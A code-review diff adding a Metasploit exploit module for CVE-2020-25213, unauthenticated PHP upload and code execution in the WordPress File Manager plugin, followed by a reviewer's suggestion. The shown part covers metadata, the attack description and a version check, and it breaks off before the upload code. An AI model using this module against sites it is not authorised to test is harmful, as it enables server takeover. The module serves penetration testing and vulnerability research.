modules/exploits/multi/http/wp_file_manager_rce.rb

```diff
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress File Manager 6.0-6.8 Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and
+          execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php
+          extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write
+          PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Alex Souza (w4fz5uck5)', # initial discovery and PoC
+            'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module
+          ],
+        'References' =>
+          [
+            [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],
+            [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],
+            [ 'CVE', '2020-25213' ],
+          ],
+        'Platform' => ['php'],
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+          [
+            [ 'WordPress File Manager 6.0-6.8', {} ]
+          ],
+        'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The URI to File Manager', '/wp-content/plugins/wp-file-manager'])
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      # the readme file contains the version information, so GET that first
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'readme.txt'),
+        'method' => 'GET'
+      )
+
+      # handle errors just in case
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
+      # no readme? no version detection. set ForceExploit to exploit even if check fails
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+      # the first line after the changelog is the currently installed version
+      changelog_info = res.body.split('== Changelog ==')[1].split("\n")[2]
+      if /(\d\.\d)/ =~ changelog_info
+        version = Gem::Version.new(Regexp.last_match(1))
+        print_status("#{peer} - Detected WordPress File Manager version #{version}")
+        # versions above 6.8 are patched and versions below 6.0 are not vulnerable
+        unless (version < Gem::Version.new('6.0')) || (version > Gem::Version.new('6.8'))
```

Comment:
you may be able to simplify this with https://github.com/rapid7/metasploit-framework/blob/05c389a6d5238aedbc4b98614261da545a2432ed/lib/msf/core/exploit/http/wordpress/version.rb#L50